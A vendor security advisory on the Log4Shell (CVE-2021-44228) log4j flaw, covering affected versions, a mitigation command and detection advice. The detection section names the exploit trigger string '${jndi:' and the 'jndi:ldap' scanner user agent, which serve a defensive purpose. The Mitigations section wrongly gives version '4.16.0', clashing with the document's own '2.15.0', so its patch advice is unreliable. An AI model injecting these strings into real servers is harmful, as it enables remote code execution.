Security Advisory Regarding Log4Shell

By |Published On: December 10th, 2021|

Summary

On December 9, there was a Remote Code Execution (RCE) discovered in the Java logging library log4j given CVE-2021-44228. The RCE is triggered by Java-based applications logging the exploit string and executing a remote payload that the string is pointing to. This vulnerability leaves any server hosting an unpatched java application vulnerable to exploitation.

Log4j2 released version 2.15.0 on Dec 09, 2021 to fix the vulnerability.

Details

The vulnerability affects Log4j versions 1.0 to 2.14.1. If you are running any Java application that uses the affected log4j libraries and that accepts and logs user input, make a significant effort to patch the update. For enterprise customers, this means Java-based web applications, and perhaps even network or security appliances that integrate Java as a part of their operations. Java’s famous tagline is that it runs on billions of devices. Apache Struts appears to be affected, but some versions of the JDK were not affected as they were secured. 

LunaSec has a more detailed write up on the vulnerability and exploit.

Please note that log4j 2.12.1 was the last release of log4j that supported Java 7 and that patching this vulnerability may require updating the JVM to Java 8. 

Mitigations

Update all log4j versions to 4.16.0, as there was an additional Remove Command Execution vulnerability discovered (CVE-2021-45046) for version 4.15.0. If you are unable to update you can “remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class” (https://logging.apache.org/log4j/2.x/security.html).

Detection

To detect exploit attempts, look for the string “${jndi:” in web logs. If you find any results, there should also be a payload following the string. If there is allowed traffic to the payload, make sure to fully investigate the server to determine what executed.

GreyNoise has added a tag to their service to find web scanners scanning for the vulnerability:

Web Scanners scanning with the user agent “jndi:ldap”

Web Scanners tagged with log4j

Additional Resources

Proof of concept exploits for this vulnerability as well as detailed write-ups are currently available below:

About Hurricane Labs

Hurricane Labs is a dynamic Managed Services Provider that unlocks the potential of Splunk and security for diverse enterprises across the United States. With a dedicated, Splunk-focused team and an emphasis on humanity and collaboration, we provide the skills, resources, and results to help make our customers’ lives easier.

For more information, visit www.hurricanelabs.com and follow us on Twitter @hurricanelabs.